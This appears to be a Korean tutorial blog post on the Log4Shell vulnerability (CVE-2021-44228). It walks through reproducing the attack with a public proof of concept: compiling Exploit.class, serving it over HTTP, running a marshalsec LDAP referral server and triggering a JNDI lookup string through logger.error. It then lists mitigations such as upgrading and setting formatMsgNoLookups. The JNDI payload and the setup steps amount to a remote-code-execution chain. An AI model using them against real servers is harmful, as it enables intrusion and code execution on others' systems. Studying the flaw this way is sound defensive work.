![[ 이슈거리 ][ CVE-2021-44228 ] log4j 의 취약점을 이용한 공격방법](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FQjI6A%2FbtrnJciV87W%2F758ppJFkQGv66hVUqMmK00%2Fimg.gif)
Apache Log4j Remote Code Execution
개요
- 12.10 9:40 KST에 Advisory Database에 CVE-2021-44228 에 기재된 보안 취약점.
- 아파치 소프트웨어 재단의 log4j 라이브러리에 있는 보안취약점이다.
- log4j (2.15.0 미만의 버전 )에서 JNDI API가 메세지로 파싱될때 실행되는 점을 이용한 공격이다.
logger.error("${jndi:ldap://127.0.0.1:1389/Exploit}"); // jndi API가 실행된다.
컴퓨터 역사상 최악의 보안 취약점으로 기억 될만큼 파장이 클 것으로 예상된다.
https://www.wired.com/story/log4j-flaw-hacking-internet/
‘The Internet Is on Fire’
The flaw in the logging framework has security teams scrambling to put in a fix.
www.wired.com
https://m.etnews.com/20211212000028
과기정통부, Apache Log4j 2 웹서비스 긴급 보안패치 권고
과학기술정보통신부는 Apache Log4j 2 서비스에 대한 보안취약점이 발견됨에 따라 12일 긴급 보안업데이트를 권고했다. 관련 취약점을 공격자가 악용할 경우 악성코드 감염 등의 피해를 발생시킬
www.etnews.com
공격 방법
https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
위 깃 레포를 토대로 재현해볼수 있다.
1. git repo를 clone 받는다
git clone https://github.com/tangxiaofeng7/apache-log4j-poc.git
2. 악성 코드가 들어가있는 Exploit.java를 class파일로 컴파일 시켜놓는다.
cd apache-log4j-poc/src/main/java
javac Exploit.javajava 폴더 내부에 Exploit.class 파일이 들어가 있다.
3. python의 SimpleHTTPServer로 8888 포트에 java 폴더에서 서버를 띄운다.
python -m SimpleHTTPServer 8888
# Serving HTTP on 0.0.0.0 port 8888 ...
4. ldap을 이용한 네트워크 디렉토리 서버를 생성한다.
LDAP ( Lightweight Directory Access Protocol ) - 조직이나, 개체, 그리고 인터넷이나 기업 내의 인트라넷 등 네트웍 상에 있는 파일이나 장치들과 같은 자원 등의 위치를 찾을 수 있게 해주는 소프트웨어 프로토콜
cd tools
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"
# Listening on 0.0.0.0:13891389 포트에 8888 포트에서 열어둔 서버에 연결된 LDAP 서버를 생성시켰다.
여기까지 악성 코드가 담긴 파일 Exploit.class 를 올려둔 LDAP 서버를 생성시켰다.
이제 공격당할 서버내에 있는 log4j라이브러리에서 우리가 만든 LDAP에 접근하여 Exploit.class 를 실행시켜 보자.
5. log4j라이브러리 (2.14.1) 다운로드
<!-- pom.xml -->
<dependencies>
<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.14.1</version>
</dependency>
</dependencies>
6. log4.j 실행
logger.error("${jndi:ldap://127.0.0.1:1389/Exploit}");> jndi API 를 통해 우리가 띄어놓은 1389포트에서 Exploit.class를 실행시키는 로직.
jndi (Java Naming and Directory Interfce ) 란 디렉터리 서비스에서 제공하는 데이터 및 객체를 발견( discover )하고 참고 ( lookup )하기 위한 자바 API이다.
Exploit에 연락처 앱을 실행시키도록 하는 로직이 들어가 있고.
그 파일을 log4j에서 jndi api를 통해 localhost:1389을 통해 접근 하여 실행시킬 수 있었다.
같은방법으로 공격할 서버로그 ( log4j ) 를 이용해,
공격자의 악성코드가 담긴 파일을 강제로 실행시키는 공격이 가능하다.
방어 방법
알려진 방어 방법으로는 log4j를 2.15.0 버전으로 업데이트 하는 것을 추천하고있다.
2.15.0 이하 2.10.0 이상 버전에서는 Dlog4j2.formatMsgNoLookups=true 인자를 추가하여 방어할 수 있다.
java -Dlog4j2.formatMsgNoLookups=true -jar app.jar
2.10.0 미만 2.7.0 이상 버전에서는 log4.xml에서 %m을 %m{nolookups}으로 교체하여 방어할 수 있다.
<SystemPropertyArbiter propertyName="env" propertyValue="dev">
<Console name="Out">
<PatternLayout pattern="$m{nolookups}%n"/><!-- %m => $m{nolookups} -->
</Console>
</SystemPropertyArbiter>
logback과 같은 다른 라이브러리로 대체하여 방어할 수도 있다.
참조 사이트
- https://github.com/greymd/CVE-2021-44228
GitHub - greymd/CVE-2021-44228
Contribute to greymd/CVE-2021-44228 development by creating an account on GitHub.
github.com
- https://jabcholove.tistory.com/89
LDAP 란 무엇인가.? +_+
구시대의 오래된 문서이지만 참고하기는 더좋을게 없네요 짧게 설명 - LDAP (Lightweight Directory Access Protocol) LDAP는 조직이나, 개체, 그리고 인터넷이나 기업 내의 인트라넷 등 네트웍 상에 있는 파일
jabcholove.tistory.com
- https://go-coding.tistory.com/76
[JAVA] JNDI란?
JNDI란? 회사에서 개발환경을 세팅하다가 JNDI를 설정할 일이 있었다. 처음에는 JNDI가 뭐지? 생각하고 있다가 이것 저것 알아보니 매우 중요한 기술인것을 알고 내 나름대로 정리해본다. JNDI(Java Nam
go-coding.tistory.com